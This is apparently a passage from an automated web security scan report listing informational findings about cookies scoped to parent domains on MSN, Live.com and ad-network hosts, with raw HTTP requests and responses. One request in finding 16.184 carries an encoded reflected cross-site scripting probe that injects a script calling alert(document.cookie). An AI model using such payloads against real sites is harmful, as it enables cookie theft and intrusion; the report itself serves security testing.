Set-Cookie: BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click

document.write('<script LANGUAGE="JavaScript1.1"');document.write('SRC="http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=000073
...[SNIP]...

16.175. http://realestate.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=3caf83355b934bd3a1c3218117df8e52; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=2B753083113044228D3A08B4704A491E; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3caf83355b934bd3a1c3218117df8e52; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2B753083113044228D3A08B4704A491E; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:34 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.176. http://realestate.redacted/OmRedir.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/OmRedir.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=c7e4694c7e8948a0a852cd53f852c2cd; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E61C86B6F829406795830566D6BAA5ED; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:42 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OmRedir.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:42 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c7e4694c7e8948a0a852cd53f852c2cd; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E61C86B6F829406795830566D6BAA5ED; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:42 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...

16.177. http://realestate.redacted/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/article.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=93ed9493a41741609bf76926d6d18474; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=BB4451F20548401188ACB52B32195513; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=93ed9493a41741609bf76926d6d18474; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=BB4451F20548401188ACB52B32195513; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:38 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.178. http://realestate.redacted/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.redacted
Path:	/slideshow.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=743d5dfc20ea49fc927bbf5e52addae3; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D11A40DFEBAF4362805A6A47E91AD76D; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /slideshow.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=743d5dfc20ea49fc927bbf5e52addae3; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D11A40DFEBAF4362805A6A47E91AD76D; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:35 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 50044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.179. http://redtape.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redtape.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=3df9ab73640c1ed44c1858b2a3c651a7; expires=Sat, 25-Jan-2031 02:18:21 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: redtape.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.180. https://sb.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sb.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=c9bed8b-173.223.190.110-1296351426; expires=Tue, 29-Jan-2013 01:37:06 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b HTTP/1.1
Host: sb.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.181. http://search.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.redacted
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_HOP=I=1&TS=1296351428; domain=.redacted; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.redacted; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: search.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Akamai-TestID: eb356f92ec934ef7abb977318c2c1fa7
Expires: Sun, 30 Jan 2011 01:37:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:37:08 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296351428; domain=.redacted; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.redacted; path=/

16.182. https://security.live.com/LoginStage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://security.live.com
Path:	/LoginStage.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mkt=ep=en-US; domain=.live.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.183. https://security.live.com/LoginStage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://security.live.com
Path:	/LoginStage.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

xid=ef438ff2-3226-4bb0-84b7-a945e2ffe5ee&&TK2xxxxxxx1B06&61; domain=.live.com; path=/
mktstate=S=783525862&U=&E=&P=&B=en; domain=.live.com; path=/
mkt1=norm=en; domain=.live.com; path=/
wlv=A|_-d:s*phzLBQ.2+1+0+3; domain=.live.com; path=/
E=P:+L7nTSGOzYg=:BemJ+zHQEPLPNnFkDqtAse01gEABPmRe8NpO46JTjNc=:F; domain=.live.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.184. http://seg.admailtiser.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.admailtiser.com
Path:	/st

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ciconv0=6940311042157494960$8601-b691916b-c3bc-4ec5-b037-99e1592c243a; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:54 GMT; Path=/
ciconv1=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:54 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601&cirf=http%3A%2F%2Fwww.reimage.com%2Flp%2Fnhome%2Findex.php%3Ftracking%3DNeudesic69f18%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E602f708c63d%26banner%3D%26banner%3D728x90-1%5C%26adgroup%3Ddirect%26ads_name%3Ddirect%26keyword%3Ddirect&ciprf=http%3A%2F%2Fburp%2Fshow%2F9 HTTP/1.1
Host: seg.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: ciconv0=6940311042157494960$8601-b691916b-c3bc-4ec5-b037-99e1592c243a; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:54 GMT; Path=/
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: ciconv1=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:54 GMT; Path=/
Location: http://ib.adnxs.com/seg?member=104&add_code=86011
Content-Length: 0
Date: Sun, 30 Jan 2011 01:23:53 GMT
Server: Apache

16.185. https://signup.live.com/signup.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signup.live.com
Path:	/signup.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

mkt=ep=en-US; domain=.live.com; path=/; secure
xid=ffbfad06-ce49-4990-af01-ca3897d55b66&&CO1xxxxxxC208&61; domain=.live.com; path=/; secure
mktstate=S=-1109498027&U=&E=en-us&B=en&P=; domain=.live.com; path=/; secure
mkt1=norm=en-us; domain=.live.com; path=/; secure

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup.aspx?ru=http%3a%2f%2fmail.live.com%2f%3frru%3dinbox&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US&bk=1296342737&cru=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d6.1.6206.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26lc%3d1033%26id%3d251248%26cbcxt%3dhom%26mkt%3den-US HTTP/1.1
Host: signup.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342838&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx%3Fru%3Dhttp%253a%252f%252fmail.live.com%252f%253frru%253dinbox%26wa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26lc%3D1033%26id%3D251248%26cbcxt%3Dhom%26mkt%3Den-US%26bk%3D1296342737%26cru%3Dhttps:%2F%2Flogin.live.com%2Flogin.srf%253fwa%253dwsignin1.0%2526rpsnv%253d11%2526rver%253d6.1.6206.0%2526wp%253dMBI%2526wreply%253dhttp:%25252F%25252Fmail.live.com%25252F%25253Frru%25253Dhome%252526livecom%25253D1%2526lc%253d1033%2526id%253d251248%2526cbcxt%253dhom%2526mkt%253den-US%26lic%3D1&lc=1033&id=68692
Server: Microsoft-IIS/7.0
Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/; secure
Set-Cookie: xid=ffbfad06-ce49-4990-af01-ca3897d55b66&&CO1xxxxxxC208&61; domain=.live.com; path=/; secure
Set-Cookie: xidseq=1; domain=.live.com; path=/; secure
Set-Cookie: mktstate=S=-1109498027&U=&E=en-us&B=en&P=; domain=.live.com; path=/; secure
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/; secure
Set-Cookie: mkt2=marketing=en-us; domain=.signup.live.com; path=/; secure
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:58 GMT; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sat, 29 Jan 2011 23:13:57 GMT
Connection: close
Content-Length: 919

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342838&rver=6.1.6206.0&w
...[SNIP]...

16.186. https://signup.live.com/signup.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signup.live.com
Path:	/signup.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ipl=c=8SNt4URhbGxhc3xOb3J0aCBBbWVyaWNhfFVuaXRlZCBTdGF0ZXN8dXN8MzIuNzk5OTk5fC05Ni43ODcwMDJ8NzUyMDd8U291dGggQ2VudHJhbHxUZXhhcw&v=2; domain=.live.com; path=/; secure; HttpOnly
xid=edb93499-9e17-4a85-b8d1-8d8140696b6f&&CO1xxxxxxC107&61; domain=.live.com; path=/; secure
mktstate=S=-1109498027&U=&E=&P=&B=en; domain=.live.com; path=/; secure
mkt1=norm=en; domain=.live.com; path=/; secure

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup.aspx HTTP/1.1
Host: signup.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342837&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx%3Flic%3D1&lc=1033&id=68692
Server: Microsoft-IIS/7.0
Set-Cookie: ipl=c=8SNt4URhbGxhc3xOb3J0aCBBbWVyaWNhfFVuaXRlZCBTdGF0ZXN8dXN8MzIuNzk5OTk5fC05Ni43ODcwMDJ8NzUyMDd8U291dGggQ2VudHJhbHxUZXhhcw&v=2; domain=.live.com; path=/; secure; HttpOnly
Set-Cookie: xid=edb93499-9e17-4a85-b8d1-8d8140696b6f&&CO1xxxxxxC107&61; domain=.live.com; path=/; secure
Set-Cookie: xidseq=1; domain=.live.com; path=/; secure
Set-Cookie: mktstate=S=-1109498027&U=&E=&P=&B=en; domain=.live.com; path=/; secure
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/; secure
Set-Cookie: mkt2=marketing=en-us; domain=.signup.live.com; path=/; secure
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:57 GMT; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Sat, 29 Jan 2011 23:13:57 GMT
Connection: close
Content-Length: 331

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342837&rver=6.1.6206.0&w
...[SNIP]...

16.187. http://social.entertainment.redacted/bloglist.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/bloglist.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=339e672cfcfc4e9bb100367db460c745; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=32E934AA60CC44708EAEB1A4EA677746; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bloglist.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:49 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=339e672cfcfc4e9bb100367db460c745; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=32E934AA60CC44708EAEB1A4EA677746; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:49 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.188. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/the-hitlist-blog.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=70a16c71a55c4c61a3a1f7e96fd37f9b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=496C3F39553B4397A714AABA23E48508; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8 HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.189. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/videodrone-blog.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=95fdb1a67d8c452591b9b1d3553ca658; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1219E6217C35489A85953685DFCF99E9; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/videodrone-blog.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=95fdb1a67d8c452591b9b1d3553ca658; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1219E6217C35489A85953685DFCF99E9; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 56969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.190. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/videodrone-blogpost.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=6d751073fa5b4121b2cd69496e39f021; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8104721B1DA441FBA6658BE28078FA49; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/videodrone-blogpost.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6d751073fa5b4121b2cd69496e39f021; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8104721B1DA441FBA6658BE28078FA49; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.191. http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/Forums/en-US/windowsphone7series/threads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Mon, 28-Feb-2011 23:26:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Forums/en-US/windowsphone7series/threads HTTP/1.1
Host: social.msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: .ASPXANONYMOUS=_HXAcN3ezAEkAAAANTFiOTVkNDAtNzBkMy00OTlmLWIwYjgtMDcxN2MxMTZkMWFmbxOZ7JYQP3dzD3-g9V1k7zpmuBI1; expires=Sun, 29-Jan-2012 23:26:34 GMT; path=/; HttpOnly
